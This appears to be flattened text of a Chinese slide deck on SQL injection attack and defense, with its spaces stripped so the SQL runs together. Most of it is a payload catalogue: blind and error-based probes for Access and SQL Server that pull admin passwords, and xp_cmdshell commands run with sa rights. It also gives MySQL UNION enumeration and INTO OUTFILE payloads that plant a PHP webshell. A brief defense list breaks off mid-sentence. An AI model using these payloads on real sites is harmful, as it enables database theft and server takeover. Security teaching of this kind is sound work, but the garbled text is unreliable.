SQL注入攻擊與防御

SQL注入攻擊與防御SQL注入圖像、語音、文字等數(shù)據(jù)(Data)在計算機(jī)系統(tǒng)中，各種字母、數(shù)字符號的組合、語音、圖形、圖像等統(tǒng)稱為數(shù)據(jù)。Access、MSSQL、Oracle、SQLITE、MySQL等數(shù)據(jù)庫(Database)數(shù)據(jù)庫是按照數(shù)據(jù)結(jié)構(gòu)來組織、存儲和管理數(shù)據(jù)的“倉庫”。Access、MSSQL、Oracle、SQLITE、MySQL等數(shù)據(jù)庫管理系統(tǒng)(DBMS)數(shù)據(jù)庫管理系統(tǒng)(databasemanagementsystem)是一種操縱和管理數(shù)據(jù)庫的軟件，用于建立、使用和維護(hù)數(shù)據(jù)庫。它對數(shù)據(jù)庫進(jìn)行統(tǒng)一的管理和控制，以保證數(shù)據(jù)庫的安全性和完整性。DQL、DDL、DML、TCL、DCL結(jié)構(gòu)化查詢語言(SQL)結(jié)構(gòu)化查詢語言(StructuredQueryLanguage)簡稱SQL，結(jié)構(gòu)化查詢語言是一種數(shù)據(jù)庫查詢和程序設(shè)計語言，用于存取數(shù)據(jù)以及查詢、更新和管理關(guān)系數(shù)據(jù)庫系統(tǒng)。SQL注入這是一個Access數(shù)據(jù)庫SQL注入靜態(tài)網(wǎng)頁：

html或者h(yuǎn)tm，是一種靜態(tài)的頁面格式，不需要服務(wù)器解析其中的腳本。由瀏覽器如(IE、Chrome等)解析。1.不依賴數(shù)據(jù)庫2.靈活性差，制作、更新、維護(hù)麻煩3.交互性交差，在功能方面有較大的限制4.安全，不存在SQL注入漏洞動態(tài)網(wǎng)頁：

asp、aspx、php、jsp等，由相應(yīng)的腳本引擎來解釋執(zhí)行，根據(jù)指令生成靜態(tài)網(wǎng)頁。1.依賴數(shù)據(jù)庫2.靈活性好，維護(hù)簡便3.交互性好，功能強(qiáng)大4.存在安全風(fēng)險，可能存在SQL注入漏洞SQL注入漏洞介紹

由于程序中對用戶輸入檢查不嚴(yán)格，用戶可以提交一段數(shù)據(jù)庫查詢代碼，根據(jù)程序返回的結(jié)果，獲得某些他想得知的數(shù)據(jù)，這就是所謂的SQLInjection，即SQL注入。原因分析

其本質(zhì)是由于對輸入檢查不充分，導(dǎo)致SQL語句將用戶提交的非法數(shù)據(jù)當(dāng)作語句的一部分來執(zhí)行。SQL注入SQL注入分類：按提交字符類型可分為：數(shù)字型

字符型

搜索型按HTTP提交方式可分為：GET、POST、Cookie按注入方式可分為：盲注、

union注入、報錯注入、基于時間注入編碼問題：寬字節(jié)注入SQL注入如何判斷？1.單引號判斷2.數(shù)字型注入判斷①and1=1and1=2and1isnulland1isnotnullanduser>0②參數(shù)進(jìn)行運(yùn)算+1-1'+'→'%2B'3.字符型注入判斷①'and'1'='1'and'1'='24.搜索型注入判斷①test%'and1=1and'%'='test%'and1=2and'%'='SQL注入如何攻擊？Access→盲注andexists(select*fromtable)andexists(selectcolumnfromtable)and(selecttop1len(id)fromadmin)>0and(selecttop1asc(mid(id,1,1))fromadmin)>X無差異→構(gòu)造差異andiif((1=1),2,'a')=2andiif((1=2),2,'a')=2SQL注入SqlServer注入→三種權(quán)限①SA權(quán)限可以利用MsSQL數(shù)據(jù)庫自帶的擴(kuò)展存儲（如：xp_cmdshell、xp_regwrite、sp_oacreate等）執(zhí)行系統(tǒng)命令。②DB_OWNER權(quán)限具有對當(dāng)前數(shù)據(jù)庫的修改、刪除、新增數(shù)據(jù)表以及執(zhí)行xp_regread、xp_dirtree等部分存儲過程的權(quán)限。差異備份獲取Webshell。③PUBLIC權(quán)限權(quán)限最小，通常通過報錯注入，盲注，從而獲得后臺管理員帳號密碼。SQL注入如何判斷權(quán)限？1.有錯誤回顯①anduser>0

2.無錯誤回顯①and1=(selectis_member('dbo'))//網(wǎng)頁返回正常，說明數(shù)據(jù)庫管理權(quán)限為sa②and1=(selectis_member('db_owner'))//網(wǎng)頁返回正常，說明數(shù)據(jù)庫管理權(quán)限為db_owner③and1=(selectis_member('public'))//網(wǎng)頁返回正常，說明數(shù)據(jù)庫管理權(quán)限為publicSQL注入SqlServer→盲注andexists(select*fromtable)andexists(selectcolumnfromtable)and(selecttop1len(id)fromadmin)>0and(selecttop1ascii(substring(password,1,1))fromadmin)>XSQL注入SqlServer→報錯當(dāng)前數(shù)據(jù)庫有哪些表and(selecttop1namefromsysobjects)=1and(selecttop1namefromsysobjectswherenamenotin('admin','bigclass'))=1表中的字段and(selecttop1col_name(object_id('admin'),1)fromsysobjects)=1字段的值and(selecttop1passwordfromadmin)=1SQL注入SqlServer(sa權(quán)限)→關(guān)閉錯誤提示獲取Web路徑①win2003execmaster..xp_cmdshell'copyC:\Windows\system32\inetsrv\MetaBase.xmlC:\Windows\Help\iisHelp\common\404.html'--②win2000execmaster..xp_cmdshell'copyC:\Winnt\system32\inetsrv\MetaBase.xmlC:\Winnt\Help\iisHelp\common\404.html'--SQL注入SqlServer(sa權(quán)限)→關(guān)閉錯誤提示執(zhí)行命令得到回顯①win2003execmaster..xp_cmdshell'netuser>C:\Inetpub\wwwroot\cmd.txt'--②win2000execmaster..xp_cmdshell'netuser>C:\Inetpub\wwwroot\cmd.txt--SQL注入MySQL注入獲取查詢的字段數(shù)→orderbyN數(shù)據(jù)庫名→and1=2unionselect1,SCHEMA_NAMEfrominformation_schema.SCHEMATAlimitN,1表名→and1=2unionselect1,TABLE_NAMEfrominformation_schema.TABLESwhereTABLE_SCHEMA=庫HEX值limitN,1字段→and1=2unionselect1,COLUMN_NAMEfrominformation_schema.COLUMNSwhereTABLE_NAME=表名HEX值limitN,1連接字段→group_concat()SQL注入MySQL通用報錯and(select1from(selectcount(*),concat(version(),floor(rand(0)*2))xfrominformation_schema.tablesgroupbyx)a)%23SQL注入MySQL寫文件①必須知道網(wǎng)站的絕對路徑，這樣才能寫對目錄；②Mysql的版本在4.0以上，才能使用union進(jìn)行聯(lián)合查詢；③PHP配置文件php.ini中的magic_quotes_gpc=off，沒有對單引號進(jìn)行過濾；④Mysql數(shù)據(jù)庫當(dāng)前用戶擁有file_priv權(quán)限；⑤“Network”組的用戶對網(wǎng)站目錄有寫權(quán)（windows操作系統(tǒng)下網(wǎng)站目錄一般都具有該權(quán)限）。SQL注入MySQL寫文件/test.php?id=6and1=2unionselect1,2,'<?phpsystem($_REQUEST[cmd]);?>',4,5,6intooutfile'C:/apache/htdocs/site/shell.php'導(dǎo)出shell的新方式，不需要union協(xié)助select*fromtablelimit1intooutfile"d:/test.txt"linesterminatedby"<?phpeval($cmd)?>"SQL注入自動化注入工具→SqlMapSQL注入自動化注入工具→PangolinSQL注入如何防范？①對進(jìn)入數(shù)據(jù)庫的特殊字符（'"\尖括號&*;等）進(jìn)行轉(zhuǎn)義處理，或編碼轉(zhuǎn)換。②嚴(yán)格限制變量類型，比如整型變量就采用intval()函數(shù)過濾，數(shù)據(jù)庫中的存儲字段必須對應(yīng)為int型。③數(shù)據(jù)長度應(yīng)該嚴(yán)格規(guī)